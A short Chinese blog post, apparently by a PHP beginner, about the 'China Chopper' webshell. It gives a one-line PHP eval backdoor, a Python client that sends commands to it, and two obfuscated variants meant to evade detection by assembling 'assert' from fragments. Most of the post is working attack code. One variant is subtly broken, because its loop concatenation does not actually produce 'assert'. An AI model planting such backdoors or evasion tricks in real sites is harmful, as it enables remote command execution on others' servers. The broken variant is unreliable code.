关于中国菜刀,如何"切菜"

介绍

  经典标题党,中国菜刀有大牛已经分析过了->传送门(http://blog.csdn.net/p656456564545/article/details/49671829)。博主PHP刚接触,所以有了下文...

0x00  菜

关于一句话木马肯定是眼熟能详,一句话木马如下:

<?PHP eval($_GET[w]);?>

0x01  刀

一把西瓜刀如下:

# -*-coding=utf-8-*-
#!/usr/bin/env python

import sys
import requests


def encodePayload(payload):
    #请尽情蹂躏payload
    return str(payload)


cmd = sys.argv[1]
payload = encodePayload(cmd)
url = "www.xxx.com/1.php?w="+ payload
req = requests.get(url)
print req.text

 

本质上算是代码注入。

0x02 如果进行绕过呢?

需要人员在满足编程语法规则上,尽情蹂躏代码。举个栗子:编码转换、字符串拼接、特殊符号等等。

博主初学PHP思路有限,所以去百度过期的栗子一枚。

<?php
    $arr = array('a','s','s','e','r','t');
    $func = '';
    for($i=0;$i<count($arr);$i++) {
    $func .= $func . $arr[$i];
    }
    $func($_REQUEST['c']);
?>

畸形栗子一枚,定睛看了栗子半分钟。

<?php                  
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  
[/*-/*-*/0/*-/*-*/-/*-/*-*/11/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

 

posted @ 2017-06-26 11:18  米怀特  阅读(550)  评论(2编辑  收藏  举报